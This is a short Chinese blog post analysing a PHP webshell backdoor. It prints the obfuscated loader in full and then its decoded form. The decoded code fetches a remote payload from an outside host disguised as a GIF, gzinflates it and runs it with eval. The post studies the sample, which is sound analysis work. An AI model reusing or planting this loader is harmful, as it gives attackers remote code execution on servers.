zoukankan      html  css  js  c++  java
  • 窥探一句话木马后门的背后

    分析的木马后门:

     <?php
    $password='vae';//登录密码(支持菜刀)
    //----------功能程序------------------//
    $c="chr";
    session_start();
    if(empty($_SESSION['PhpCode'])){
    $url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
    $url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
    $url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
    $url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
    $url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
    $url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
    $url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
    $get=chr(102).chr(105).chr(108).chr(101).chr(95);
    $get.=chr(103).chr(101).chr(116).chr(95).chr(99);
    $get.=chr(111).chr(110).chr(116).chr(101).chr(110);
    $get.=chr(116).chr(115);
    $_SESSION['PhpCode']=$get($url);}
    $un=$c(103).$c(122).$c(105).$c(110);
    $un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));
    @eval($un($_SESSION['PhpCode']));
    ?> 

    判断如果session['Phpcode']为空的话执行七到十八行的代码

    chr函数是php当中取ascii的一个函数。

    简单得出其完整解密后的内容为:

    <?php
    $password='vae';//登录密码(支持菜刀)
    //----------功能程序------------------//
    $c="chr";
    session_start();
    if(empty($_SESSION['PhpCode'])){
    $url = "http://i.niupic.com/images/2017/05/21/v1QR1M.gif";
    $get = "file_get_contents";
    $_SESSION['PhpCode']=$get($url);}
    $un="gzinflat".$c(base64_decode('MTAx'));
    @eval($un($_SESSION['PhpCode']));
    ?>

    得知:http://i.niupic.com/images/2017/05/21/v1QR1M.gif该文件其实就是大马。打开后是乱码,刚开始以为是加密,然后转过头来看代码
    看了一下代码基本都没问题。

    这个函数特意百度了一番:https://my.oschina.net/hosser/blog/392947

  • 相关阅读:
    利用委托传值
    引用类型的默认值为Null
    字符串加密与解密 (MD5)
    讲解Guitar Pro如何显示吉他面板功能
    Guitar Pro 7 常见问题之版本更新
    Guitar Pro7常见问题之滑音的讲解
    Guitar Pro 7如何新建吉他谱步骤
    带你演绎Guitar Pro 7制作吉他谱前的步骤
    如何添加音效使乐曲更加丰富?
    Guitar Pro 吉他软件功能介绍
  • 原文地址:https://www.cnblogs.com/xishaonian/p/6980031.html
Copyright © 2011-2022 走看看